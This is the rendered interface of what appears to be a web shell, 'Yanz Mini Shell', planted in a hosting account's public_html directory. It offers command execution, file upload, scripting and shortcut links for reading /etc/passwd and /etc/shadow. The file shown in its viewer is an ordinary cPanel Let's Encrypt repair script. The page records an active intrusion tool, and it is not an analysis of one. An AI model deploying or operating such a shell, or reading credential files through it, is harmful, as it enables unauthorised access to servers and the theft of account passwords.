Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
menop
public_html
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
#!/usr/bin/env bash sleep 60 # If the le-cp symlink is valid, nothing to fix. if [ -f /usr/local/bin/le-cp ]; then exit 0 fi # If the RPM is not installed, nothing to fix. if ! rpm -q --quiet letsencrypt-cpanel; then exit 0 fi yum -yq reinstall letsencrypt-cpanel
Free Space : 162950205440 Byte